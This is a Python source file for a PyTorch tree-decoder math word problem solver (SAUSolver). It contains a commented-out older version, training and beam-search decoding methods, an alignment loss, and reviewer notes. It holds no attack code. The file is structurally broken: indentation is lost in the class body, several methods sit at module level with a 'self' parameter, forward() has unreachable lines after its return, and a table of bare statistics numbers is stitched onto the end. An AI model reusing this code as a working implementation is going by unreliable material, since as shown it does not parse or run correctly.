# o.append(TreeEmbedding(node_label[idx].unsqueeze(0), False))
# else:
# current_num = current_nums_embeddings[idx, i - num_start].unsqueeze(0)
# while len(o) > 0 and o[-1].terminal:
# sub_stree = o.pop()
# op = o.pop()
# current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
# o.append(TreeEmbedding(current_num, True))
# if len(o) > 0 and o[-1].terminal:
# left_childs.append(o[-1].embedding)
# sub_tree_emb.append(o[-1].embedding)
# loss_mask.append(torch.ones(1, dtype=torch.float))
# else:
# left_childs.append(None)
# sub_tree_emb.append(padding_hidden)
# loss_mask.append(torch.zeros(1, dtype=torch.float))
#
# sub_tree_emb = torch.stack(sub_tree_emb)
# loss_mask = torch.stack(loss_mask)
# #score = self.decoder.attn(sub_tree_emb.transpose(0, 1), encoder_outputs, seq_mask)
# score = self.decoder.saligned_attn(sub_tree_emb.transpose(0, 1), encoder_outputs, seq_mask)
# s_aligned_vector = score.bmm(encoder_outputs.transpose(0, 1)) #vector a in paper
# s_aligned_a, s_aligned_d = self.decoder.Semantically_Aligned_Regularization(sub_tree_emb, s_aligned_vector)
# sub_tree_outputs.append(s_aligned_a)
# sub_tree_target.append(s_aligned_d)
# sub_tree_mask.append(loss_mask)
#
# # all_leafs = torch.stack(all_leafs, dim=1) # B x S x 2
# all_node_outputs = torch.stack(all_node_outputs, dim=1) # B x S x N
# sub_tree_outputs = torch.cat(sub_tree_outputs, dim=1)
# sub_tree_target = torch.cat(sub_tree_target, dim=1)
# sub_tree_mask = torch.cat(sub_tree_mask, dim=1)
#
# target = target.transpose(0, 1).contiguous()
# if self.USE_CUDA:
# # all_leafs = all_leafs.cuda()
# all_node_outputs = all_node_outputs.cuda()
# target = target.cuda()
# target_length = torch.LongTensor(target_length).cuda()
# else:
# target_length = torch.LongTensor(target_length)
#
# # op_target = target < num_start
# # loss_0 = masked_cross_entropy_without_logit(all_leafs, op_target.long(), target_length)
# loss_1 = masked_cross_entropy(all_node_outputs, target, target_length)
# loss_2 = self.mse_loss(sub_tree_outputs, sub_tree_target, sub_tree_mask)
# #self.loss2.eval_batch(sub_tree_outputs, sub_tree_target)
# loss = loss_1 + self.loss_weight * loss_2
# loss.backward()
# return loss.item()
#
# def evaluate_tree(self, input_batch, input_length, generate_nums, num_pos, num_start, beam_size=5, max_length=30):
#
# seq_mask = torch.BoolTensor(1, input_length).fill_(0)
# # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
# input_var = input_batch.transpose(0, 1)
#
# num_mask = torch.BoolTensor(1, len(num_pos[0]) + len(generate_nums)).fill_(0)
#
# padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0)
#
# batch_size = 1
#
# if self.USE_CUDA:
# input_var = input_var.cuda()
# seq_mask = seq_mask.cuda()
# padding_hidden = padding_hidden.cuda()
# num_mask = num_mask.cuda()
# # Run words through encoder
#
# seq_emb = self.embedder(input_var)
# pade_outputs, _ = self.encoder(seq_emb, input_length)
# problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
# encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#
# # Prepare input and output variables
# node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
#
# num_size = len(num_pos[0])
# all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size, self.hidden_size)
# # B x P x N
# embeddings_stacks = [[] for _ in range(batch_size)]
# left_childs = [None for _ in range(batch_size)]
#
# beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
#
# for t in range(max_length):
# current_beams = []
# while len(beams) > 0:
# b = beams.pop()
# if len(b.node_stack[0]) == 0:
# current_beams.append(b)
# continue
# # left_childs = torch.stack(b.left_childs)
# left_childs = b.left_childs
#
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(b.node_stack, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
# seq_mask, num_mask)
#
# out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
#
# # out_score = p_leaf * out_score
#
# topv, topi = out_score.topk(beam_size)
#
# for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
# current_node_stack = copy_list(b.node_stack)
# current_left_childs = []
# current_embeddings_stacks = copy_list(b.embedding_stack)
# current_out = copy.deepcopy(b.out)
#
# out_token = int(ti)
# current_out.append(out_token)
#
# node = current_node_stack[0].pop()
#
# if out_token < num_start:
# generate_input = torch.LongTensor([out_token])
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
#
# current_node_stack[0].append(TreeNode(right_child))
# current_node_stack[0].append(TreeNode(left_child, left_flag=True))
#
# current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
# else:
# current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
#
# while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# sub_stree = current_embeddings_stacks[0].pop()
# op = current_embeddings_stacks[0].pop()
# current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
# current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
# if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
# else:
# current_left_childs.append(None)
# current_beams.append(TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks, current_left_childs, current_out))
# beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
# beams = beams[:beam_size]
# flag = True
# for b in beams:
# if len(b.node_stack[0]) != 0:
# flag = False
# if flag:
# break
#
# return beams[0].out
#
# def get_all_number_encoder_outputs(self, encoder_outputs, num_pos, batch_size, num_size, hidden_size):
# indices = list()
# sen_len = encoder_outputs.size(0)
# masked_index = []
# temp_1 = [1 for _ in range(hidden_size)]
# temp_0 = [0 for _ in range(hidden_size)]
# for b in range(batch_size):
# for i in num_pos[b]:
# indices.append(i + b * sen_len)
# masked_index.append(temp_0)
# indices += [0 for _ in range(len(num_pos[b]), num_size)]
# masked_index += [temp_1 for _ in range(len(num_pos[b]), num_size)]
# indices = torch.LongTensor(indices)
# masked_index = torch.BoolTensor(masked_index)
# masked_index = masked_index.view(batch_size, num_size, hidden_size)
# if self.USE_CUDA:
# indices = indices.cuda()
# masked_index = masked_index.cuda()
# all_outputs = encoder_outputs.transpose(0, 1).contiguous()
# all_embedding = all_outputs.view(-1, encoder_outputs.size(2)) # S x B x H -> (B x S) x H
# all_num = all_embedding.index_select(0, indices)
# all_num = all_num.view(batch_size, num_size, hidden_size)
# return all_num.masked_fill_(masked_index, 0.0)
#
# def generate_tree_input(self, target, decoder_output, nums_stack_batch, num_start, unk):
# # when the decoder input is copied num but the num has two pos, chose the max
# target_input = copy.deepcopy(target)
# for i in range(len(target)):
# if target[i] == unk:
# num_stack = nums_stack_batch[i].pop()
# max_score = -float("1e12")
# for num in num_stack:
# if decoder_output[i, num_start + num] > max_score:
# target[i] = num + num_start
# max_score = decoder_output[i, num_start + num]
# if target_input[i] >= num_start:
# target_input[i] = 0
# return torch.LongTensor(target), torch.LongTensor(target_input)
#
# def mse_loss(self, outputs, targets, mask=None):
# # outputs : [batch_size,output_len,hidden_size]
# # targets : [batch_size,output_len,hidden_size]
# # mask : [batch_size,output_len]
# mask = mask.to(self.device)
# x = torch.sqrt(torch.sum(torch.square((outputs - targets)), dim=-1)) # [batch_size,output_len]
# y = torch.sum(x * mask, dim=-1) / torch.sum(mask, dim=-1) # [batch_size]
# return torch.sum(y)
#
# def convert_idx2symbol(self, output, num_list, num_stack):
# #batch_size=output.size(0)
# '''batch_size=1'''
# seq_len = len(output)
# num_len = len(num_list)
# output_list = []
# res = []
# for s_i in range(seq_len):
# idx = output[s_i]
# if idx in [self.out_sos_token, self.out_eos_token, self.out_pad_token]:
# break
# symbol = self.out_idx2symbol[idx]
# if "NUM" in symbol:
# num_idx = self.mask_list.index(symbol)
# if num_idx >= num_len:
# res = []
# break
# res.append(num_list[num_idx])
# elif symbol == SpecialTokens.UNK_TOKEN:
# try:
# pos_list = num_stack.pop()
# c = num_list[pos_list[0]]
# res.append(c)
# except:
# return None
# else:
# res.append(symbol)
# output_list.append(res)
# return output_list
class SAUSolver_(nn.Module):
def __init__(self, config, dataset):
super().__init__()
#parameter
self.hidden_size = config["hidden_size"]
self.device = config["device"]
self.beam_size = config['beam_size']
self.max_out_len = config['max_output_len']
self.embedding_size = config["embedding_size"]
self.dropout_ratio = config["dropout_ratio"]
self.num_layers = config["num_layers"]
self.rnn_cell_type = config["rnn_cell_type"]
self.loss_weight = config['loss_weight']
self.vocab_size = len(dataset.in_idx2word)
self.out_symbol2idx = dataset.out_symbol2idx
self.out_idx2symbol = dataset.out_idx2symbol
generate_list = dataset.generate_list
self.generate_nums = [self.out_symbol2idx[symbol] for symbol in generate_list]
self.mask_list = NumMask.number
self.num_start = dataset.num_start
self.operator_nums = dataset.operator_nums
self.generate_size = len(generate_list)
self.unk_token = self.out_symbol2idx[SpecialTokens.UNK_TOKEN]
try:
self.out_sos_token = self.out_symbol2idx[SpecialTokens.SOS_TOKEN]
except:
self.out_sos_token = None
try:
self.out_eos_token = self.out_symbol2idx[SpecialTokens.EOS_TOKEN]
except:
self.out_eos_token = None
try:
self.out_pad_token = self.out_symbol2idx[SpecialTokens.PAD_TOKEN]
except:
self.out_pad_token = None
#module
self.embedder = BaiscEmbedder(self.vocab_size, self.embedding_size, self.dropout_ratio)
self.encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type, self.dropout_ratio)
self.decoder = SARTreeDecoder(self.hidden_size, self.operator_nums, self.generate_size, self.dropout_ratio)
self.node_generater = NodeGenerater(self.hidden_size, self.operator_nums, self.embedding_size, self.dropout_ratio)
self.merge = SubTreeMerger(self.hidden_size, self.embedding_size, self.dropout_ratio)
self.loss1 = MaskedCrossEntropyLoss()
#
def forward(self,seq, seq_length, nums_stack, num_size, generate_nums, num_pos,\
num_start,target=None, target_length=None,max_length=30,beam_size=5,UNK_TOKEN=None):
# sequence mask for attention
beam_size = self.beam_size
seq_mask = []
max_len = max(seq_length)
for i in seq_length:
seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
seq_mask = torch.BoolTensor(seq_mask).to(self.device)
num_mask = []
max_num_size = max(num_size) + len(generate_nums)
for i in num_size:
d = i + len(generate_nums)
num_mask.append([0] * d + [1] * (max_num_size - d))
num_mask = torch.BoolTensor(num_mask).to(self.device)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0).to(self.device)
batch_size = len(seq_length)
seq_emb = self.embedder(seq)
pade_outputs, _ = self.encoder(seq_emb, seq_length)
problem_output = pade_outputs[:, -1, :self.hidden_size] + pade_outputs[:, 0, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#print("encoder_outputs", encoder_outputs.size())
#print("problem_output", problem_output.size())
if target != None:
all_node_outputs, target=self.generate_node(encoder_outputs,problem_output,target,target_length,\
num_pos,nums_stack,padding_hidden,seq_mask,num_mask,UNK_TOKEN,num_start)
else:
all_node_outputs = self.generate_node_(encoder_outputs, problem_output, padding_hidden, seq_mask, num_mask, num_pos, num_start, beam_size, max_length)
return all_node_outputs
# all_leafs = torch.stack(all_leafs, dim=1) # B x S x 2
all_node_outputs = torch.stack(all_node_outputs, dim=1).to(self.device) # B x S x N
return all_node_outputs, target
def calculate_loss(self, batch_data):
seq = batch_data["question"]
seq_length = batch_data["ques len"]
nums_stack = batch_data["num stack"]
num_size = batch_data["num size"]
num_pos = batch_data["num pos"]
target = batch_data["equation"]
target_length = batch_data["equ len"]
equ_mask = batch_data["equ mask"]
generate_nums = self.generate_nums
num_start = self.num_start
# sequence mask for attention
beam_size = self.beam_size
seq_mask = []
max_len = max(seq_length)
for i in seq_length:
seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
seq_mask = torch.BoolTensor(seq_mask).to(self.device)
num_mask = []
max_num_size = max(num_size) + len(generate_nums)
for i in num_size:
d = i + len(generate_nums)
num_mask.append([0] * d + [1] * (max_num_size - d))
num_mask = torch.BoolTensor(num_mask).to(self.device)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0).to(self.device)
batch_size = len(seq_length)
seq_emb = self.embedder(seq)
pade_outputs, _ = self.encoder(seq_emb, seq_length)
problem_output = pade_outputs[:, -1, :self.hidden_size] + pade_outputs[:, 0, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#print("encoder_outputs", encoder_outputs.size())
#print("problem_output", problem_output.size())
UNK_TOKEN = self.unk_token
all_node_outputs, sub_tree_outputs,sub_tree_target,sub_tree_mask=self.generate_node(encoder_outputs,problem_output,target,target_length,\
num_pos,nums_stack,padding_hidden,seq_mask,num_mask,UNK_TOKEN,num_start)
all_node_outputs = torch.stack(all_node_outputs, dim=1).to(self.device)
sub_tree_outputs = torch.cat(sub_tree_outputs, dim=1)
sub_tree_target = torch.cat(sub_tree_target, dim=1)
sub_tree_mask = torch.cat(sub_tree_mask, dim=1)
#sub_tree_outputs = sub_tree_outputs.view(-1,sub_tree_outputs.size(-1))
#sub_tree_target = sub_tree_target.view(-1,sub_tree_target.size(-1))
self.loss1.reset()
#self.loss2.reset()
self.loss1.eval_batch(all_node_outputs, target, equ_mask)
loss_2 = self.mse_loss(sub_tree_outputs, sub_tree_target, sub_tree_mask)
#self.loss2.eval_batch(sub_tree_outputs, sub_tree_target)
loss = self.loss1.acc_loss + self.loss_weight * loss_2
loss.backward()
return loss.item()
def model_test(self, batch_data):
seq = batch_data["question"]
seq_length = batch_data["ques len"]
nums_stack = batch_data["num stack"]
num_size = batch_data["num size"]
num_pos = batch_data["num pos"]
target = batch_data["equation"]
num_list = batch_data['num list']
#target_length=batch_data["equ len"]
generate_nums = self.generate_nums
num_start = self.num_start
# sequence mask for attention
beam_size = self.beam_size
max_length = self.max_out_len
seq_mask = []
max_len = max(seq_length)
for i in seq_length:
seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
seq_mask = torch.BoolTensor(seq_mask).to(self.device)
num_mask = []
max_num_size = max(num_size) + len(generate_nums)
for i in num_size:
d = i + len(generate_nums)
num_mask.append([0] * d + [1] * (max_num_size - d))
num_mask = torch.BoolTensor(num_mask).to(self.device)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0).to(self.device)
batch_size = len(seq_length)
seq_emb = self.embedder(seq)
pade_outputs, _ = self.encoder(seq_emb, seq_length)
problem_output = pade_outputs[:, -1, :self.hidden_size] + pade_outputs[:, 0, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#print("encoder_outputs", encoder_outputs.size())
#print("problem_output", problem_output.size())
all_node_outputs = self.generate_node_(encoder_outputs, problem_output, padding_hidden, seq_mask, num_mask, num_pos, num_start, beam_size, max_length)
all_outputs = self.convert_idx2symbol(all_node_outputs, num_list[0], copy_list(nums_stack[0]))
targets = self.convert_idx2symbol(target[0], num_list[0], copy_list(nums_stack[0]))
return all_outputs, targets
    def generate_node(self,encoder_outputs,problem_output,target,target_length,\
                      num_pos,nums_stack,padding_hidden,seq_mask,num_mask,unk,num_start):
        """Teacher-forced top-down tree decoding for one training batch.

        At each target step the tree decoder scores operator + number tokens,
        the node generator expands operator nodes into left/right children, and
        finished sub-trees are merged bottom-up on per-example embedding
        stacks. Sub-tree embeddings and their semantically-aligned counterparts
        are collected for the auxiliary regularization loss.

        NOTE(review): ``target`` is modified in place — UNK entries are
        replaced column-by-column via generate_tree_input_.

        Returns:
            tuple(list, list, list, list):
                all_node_outputs — per-step score tensors (each B x N),
                sub_tree_outputs / sub_tree_target — per-step aligned vectors,
                sub_tree_mask — per-step 0/1 masks for the alignment loss.
        """
        batch_size = encoder_outputs.size(0)
        # Prepare input and output variables: one goal-node stack per example,
        # rooted at that example's problem representation.
        node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
        max_target_length = max(target_length)
        all_node_outputs = []
        sub_tree_outputs = []
        sub_tree_target = []
        sub_tree_mask = []
        # all_leafs = []
        copy_num_len = [len(_) for _ in num_pos]
        num_size = max(copy_num_len)
        # gather encoder states at the number positions (B x num_size x H)
        all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, num_size, self.hidden_size)
        #print("all_nums_encoder_outputs", all_nums_encoder_outputs.size())
        left_childs = [None for _ in range(batch_size)]  # embedding of each example's finished left sibling (or None)
        embeddings_stacks = [[] for _ in range(batch_size)]  # per-example stacks of partial sub-tree embeddings
        for t in range(max_target_length):
            num_score, op, current_embeddings, current_context, current_nums_embeddings = \
                self.decoder(node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, \
                             padding_hidden, seq_mask, num_mask)
            # all_leafs.append(p_leaf)
            outputs = torch.cat((op, num_score), 1)
            all_node_outputs.append(outputs)
            # resolve UNK targets to the best-scoring candidate number (mutates target)
            target_t, generate_input = self.generate_tree_input_(target[:, t].tolist(), outputs, nums_stack, num_start, unk)
            target[:, t] = target_t
            generate_input = generate_input.to(self.device)
            left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
            #print("left_child", left_child.size())
            #print("right_child", right_child.size())
            #print("node_label", node_label.size())
            left_childs = []
            #print("target", target.size())
            #print("target[:,t]", target[:,t].size())
            sub_tree_emb = []
            loss_mask = []
            for idx, l, r, node_stack, i, o in zip(range(batch_size), left_child.split(1), right_child.split(1), node_stacks, target[:, t].tolist(), embeddings_stacks):
                if len(node_stack) != 0:
                    node = node_stack.pop()
                else:
                    # this example's tree is already complete: emit padding + zero mask
                    left_childs.append(None)
                    sub_tree_emb.append(padding_hidden)
                    loss_mask.append(torch.zeros(1, dtype=torch.float))
                    continue
                if i < num_start:
                    # operator token: push right child first so the left child pops next
                    node_stack.append(TreeNode(r))
                    node_stack.append(TreeNode(l, left_flag=True))
                    o.append(TreeEmbedding(node_label[idx].unsqueeze(0), False))
                else:
                    # number token: merge completed sub-trees bottom-up on the stack
                    try:
                        current_num = current_nums_embeddings[idx, i - num_start].unsqueeze(0)
                    except:
                        # debug dump before re-raising: the target index points
                        # outside the gathered number embeddings
                        print('current_num_emb:', current_nums_embeddings.size(), 'num start:', self.num_start, 'token idx:', i)
                        print('out list:', self.out_idx2symbol, 'out gen:', self.generate_size)
                        print('batch i:', i)
                        raise ValueError
                    while len(o) > 0 and o[-1].terminal:
                        sub_stree = o.pop()
                        op = o.pop()
                        current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
                    o.append(TreeEmbedding(current_num, True))
                if len(o) > 0 and o[-1].terminal:
                    # finished sub-tree: expose it as the next left sibling and
                    # include it in this step's alignment loss
                    left_childs.append(o[-1].embedding)
                    sub_tree_emb.append(o[-1].embedding)
                    loss_mask.append(torch.ones(1, dtype=torch.float))
                else:
                    left_childs.append(None)
                    sub_tree_emb.append(padding_hidden)
                    loss_mask.append(torch.zeros(1, dtype=torch.float))
            #
            sub_tree_emb = torch.stack(sub_tree_emb)
            loss_mask = torch.stack(loss_mask)
            # semantically-aligned regularization terms for this step
            # NOTE(review): the S-x-B variant called saligned_attn with transposed
            # inputs — confirm attn here expects batch-first tensors
            score = self.decoder.attn(sub_tree_emb, encoder_outputs, seq_mask)
            s_aligned_vector = score.bmm(encoder_outputs)
            s_aligned_a, s_aligned_d = self.decoder.Semantically_Aligned_Regularization(sub_tree_emb, s_aligned_vector)
            sub_tree_outputs.append(s_aligned_a)
            sub_tree_target.append(s_aligned_d)
            sub_tree_mask.append(loss_mask)
        return all_node_outputs, sub_tree_outputs, sub_tree_target, sub_tree_mask
    def generate_node_(self,encoder_outputs,problem_output,padding_hidden,seq_mask,num_mask,num_pos,\
                       num_start,beam_size,max_length):
        """Beam-search tree decoding for evaluation (batch_size == 1).

        Keeps up to ``beam_size`` partial trees. Each step expands every
        unfinished beam with its top-k operator/number tokens: operators push
        child goal nodes, numbers trigger bottom-up sub-tree merging. Decoding
        stops early once every surviving beam's node stack is empty.

        Returns:
            list: the token-index sequence of the highest-scoring beam.
        """
        batch_size = encoder_outputs.size(0)
        # Prepare input and output variables
        node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
        num_size = len(num_pos[0])
        all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, num_size, self.encoder.hidden_size)
        embeddings_stacks = [[] for _ in range(batch_size)]
        left_childs = [None for _ in range(batch_size)]
        beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
        for t in range(max_length):
            current_beams = []
            while len(beams) > 0:
                b = beams.pop()
                if len(b.node_stack[0]) == 0:
                    # finished tree: carry the beam over unchanged
                    current_beams.append(b)
                    continue
                # left_childs = torch.stack(b.left_childs)
                left_childs = b.left_childs
                num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(b.node_stack, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
                                                                                                           seq_mask, num_mask)
                out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
                # out_score = p_leaf * out_score
                topv, topi = out_score.topk(beam_size)
                for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
                    # NOTE(review): sibling methods use the module-level copy_list();
                    # confirm this class actually defines self.copy_list
                    current_node_stack = self.copy_list(b.node_stack)
                    current_left_childs = []
                    current_embeddings_stacks = self.copy_list(b.embedding_stack)
                    current_out = copy.deepcopy(b.out)
                    out_token = int(ti)
                    current_out.append(out_token)
                    node = current_node_stack[0].pop()
                    if out_token < num_start:
                        # operator: generate children; right pushed first so left pops next
                        generate_input = torch.LongTensor([out_token]).to(self.device)
                        left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
                        current_node_stack[0].append(TreeNode(right_child))
                        current_node_stack[0].append(TreeNode(left_child, left_flag=True))
                        current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
                    else:
                        # number token: merge completed sub-trees bottom-up
                        try:
                            current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
                        except:
                            # debug dump before re-raising on an out-of-range number index
                            print('current_num_emb:', current_nums_embeddings.size(), 'num start:', self.num_start, 'token idx:', out_token)
                            print('operator:', op.size(), 'num:', num_score.size(), 'out:', out_score.size())
                            raise ValueError
                        while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
                            sub_stree = current_embeddings_stacks[0].pop()
                            op = current_embeddings_stacks[0].pop()
                            current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
                        current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
                    if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
                        current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
                    else:
                        current_left_childs.append(None)
                    current_beams.append(TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks, current_left_childs, current_out))
            # keep only the best beam_size candidates for the next step
            beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
            beams = beams[:beam_size]
            flag = True
            for b in beams:
                if len(b.node_stack[0]) != 0:
                    flag = False
            if flag:
                break
        return beams[0].out
def mse_loss(self, outputs, targets, mask=None):
    """Masked per-position distance loss, summed over the batch.

    Args:
        outputs (Tensor): [batch_size, output_len, hidden_size] predictions.
        targets (Tensor): [batch_size, output_len, hidden_size] references.
        mask (Tensor, optional): [batch_size, output_len]; 1 marks positions
            that count toward the loss. Defaults to all positions valid.

    Returns:
        Tensor: scalar — sum over the batch of each sample's mean masked distance.
    """
    if mask is None:
        # Bug fix: the old code dereferenced the default None mask and crashed.
        # "No mask" means every position contributes.
        mask = torch.ones(outputs.size(0), outputs.size(1), device=self.device)
    mask = mask.to(self.device)
    # NOTE(review): despite the name this is an L2-distance loss (sqrt of the
    # summed squared error per position), not a mean-squared error.
    dist = torch.sqrt(torch.sum(torch.square(outputs - targets), dim=-1))  # [batch_size, output_len]
    per_sample = torch.sum(dist * mask, dim=-1) / torch.sum(mask, dim=-1)  # [batch_size]
    return torch.sum(per_sample)
def get_all_number_encoder_outputs(self, encoder_outputs, num_pos, num_size, hidden_size):
    """Gather the encoder hidden state of every number token per batch item.

    Args:
        encoder_outputs (Tensor): [batch_size, seq_len, hidden_size] states.
        num_pos (list[list[int]]): per-batch positions of number tokens;
            -1 marks a missing number.
        num_size (int): padded number-slot count per batch item.
        hidden_size (int): encoder hidden dimension.

    Returns:
        Tensor: [batch_size, num_size, hidden_size]; padded/missing slots are zero.
    """
    batch_size = encoder_outputs.size(0)
    seq_len = encoder_outputs.size(1)
    masked_row = [1] * hidden_size  # slot is padding -> zeroed afterwards
    kept_row = [0] * hidden_size    # slot holds a real encoder state
    flat_indices = []
    mask_rows = []
    for b in range(batch_size):
        positions = num_pos[b]
        for pos in positions:
            if pos == -1:
                # Missing number: gather a dummy state and mask it away.
                flat_indices.append(0)
                mask_rows.append(masked_row)
            else:
                flat_indices.append(pos + b * seq_len)
                mask_rows.append(kept_row)
        padding = num_size - len(positions)
        flat_indices.extend([0] * padding)
        mask_rows.extend([masked_row] * padding)
    index_tensor = torch.LongTensor(flat_indices).to(self.device)
    mask_tensor = torch.BoolTensor(mask_rows).to(self.device).view(batch_size, num_size, hidden_size)
    # Flatten batch-first states to (batch * seq) x hidden so positions can be
    # picked with a single index_select.
    flat_states = encoder_outputs.contiguous().view(-1, encoder_outputs.size(2))
    gathered = flat_states.index_select(0, index_tensor).view(batch_size, num_size, hidden_size)
    return gathered.masked_fill_(mask_tensor, 0.0)
def generate_tree_input(self, target, decoder_output, nums_stack_batch, num_start, unk):
    """Build the decoder input sequence from a target sequence.

    Number tokens (indices >= num_start) are replaced by 0 in the input copy;
    the target itself is returned unchanged. ``decoder_output``,
    ``nums_stack_batch`` and ``unk`` are unused here but kept for interface
    parity with ``generate_tree_input_`` (which additionally resolves UNKs).

    Args:
        target (list[int]): gold output token indices.
        decoder_output: unused.
        nums_stack_batch: unused.
        num_start (int): first index of the number-token range.
        unk: unused.

    Returns:
        tuple[LongTensor, LongTensor]: (target, masked target_input).
    """
    # Dead UNK-resolution code that used to sit here was removed; see
    # generate_tree_input_ for the live version of that logic.
    target_input = [0 if token >= num_start else token for token in target]
    return torch.LongTensor(target), torch.LongTensor(target_input)
def generate_tree_input_(self, target, decoder_output, nums_stack_batch, num_start, unk):
    """Like generate_tree_input, but first resolves UNK tokens.

    For every UNK in ``target``, pops that position's candidate list from
    ``nums_stack_batch`` and replaces the UNK (mutating ``target`` in place)
    with the candidate scoring highest in ``decoder_output``. Tokens
    >= num_start then become 0 in the returned input copy.

    Returns:
        tuple[LongTensor, LongTensor]: (resolved target, masked target_input).
    """
    target_input = copy.deepcopy(target)
    for pos, token in enumerate(target):
        if token == unk:
            candidates = nums_stack_batch[pos].pop()
            best_score = -float("1e12")
            for cand in candidates:
                score = decoder_output[pos, num_start + cand]
                if score > best_score:
                    target[pos] = cand + num_start
                    best_score = score
        if target_input[pos] >= num_start:
            target_input[pos] = 0
    return torch.LongTensor(target), torch.LongTensor(target_input)
def copy_list(self, l):
    """Recursively copy a nested-list structure.

    Plain ``list`` instances are duplicated at every depth; all other items
    (including list subclasses) are shared by reference.
    """
    return [self.copy_list(item) if type(item) is list else item for item in l]
def convert_idx2symbol(self, output, num_list, num_stack):
    """Translate one decoded index sequence (batch_size == 1) into symbols.

    Decoding stops at the first SOS/EOS/PAD token. ``NUM*`` placeholders are
    replaced by the matching entry of ``num_list``; if a placeholder refers
    past the available numbers, the whole result is discarded (empty list).
    UNK tokens are resolved from ``num_stack``; returns None if that fails.

    Returns:
        list | None: a single-element list wrapping the symbol list, or None.
    """
    stop_tokens = (self.out_sos_token, self.out_eos_token, self.out_pad_token)
    symbols = []
    for idx in output:
        if idx in stop_tokens:
            break
        token = self.out_idx2symbol[idx]
        if "NUM" in token:
            position = self.mask_list.index(token)
            if position >= len(num_list):
                # Placeholder points past the question's numbers: invalid output.
                symbols = []
                break
            symbols.append(num_list[position])
        elif token == SpecialTokens.UNK_TOKEN:
            try:
                choices = num_stack.pop()
                symbols.append(num_list[choices[0]])
            except:  # noqa: E722 -- preserved: any resolution failure yields None
                return None
        else:
            symbols.append(token)
    return [symbols]
def __str__(self):
    """Append total/trainable parameter counts to the default description."""
    base = super().__str__()
    all_counts = [p.numel() for p in self.parameters()]
    trainable_counts = [p.numel() for p in self.parameters() if p.requires_grad]
    parameters = "\ntotal parameters : {} \ntrainable parameters : {}".format(
        sum(all_counts), sum(trainable_counts))
    return base + parameters
| 49.649601
| 199
| 0.579513
| 8,973
| 74,673
| 4.510309
| 0.04012
| 0.021744
| 0.02041
| 0.021349
| 0.920882
| 0.911418
| 0.900818
| 0.89338
| 0.880927
| 0.873341
| 0
| 0.01112
| 0.31958
| 74,673
| 1,503
| 200
| 49.682635
| 0.785412
| 0.426486
| 0
| 0.728183
| 0
| 0
| 0.015542
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031474
| false
| 0
| 0.020029
| 0
| 0.088698
| 0.007153
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
